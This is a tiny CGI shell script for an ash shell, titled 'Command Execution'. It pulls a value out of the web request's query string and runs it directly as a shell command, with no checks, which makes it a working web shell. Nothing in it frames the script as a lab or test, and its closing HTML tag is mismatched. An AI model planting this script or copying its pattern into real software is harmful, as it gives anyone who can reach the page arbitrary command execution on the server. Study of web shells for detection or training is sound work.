#!/bin/ash

echo Content-type: text/html
echo ""
echo "<html><head><title>Command Execution</title></head>"
echo "<body>"

CMD_ACTION=$(echo $QUERY_STRING | cut -d\= -f2 | sed 's/+/\ /g')

$CMD_ACTION

echo "</body></title>"
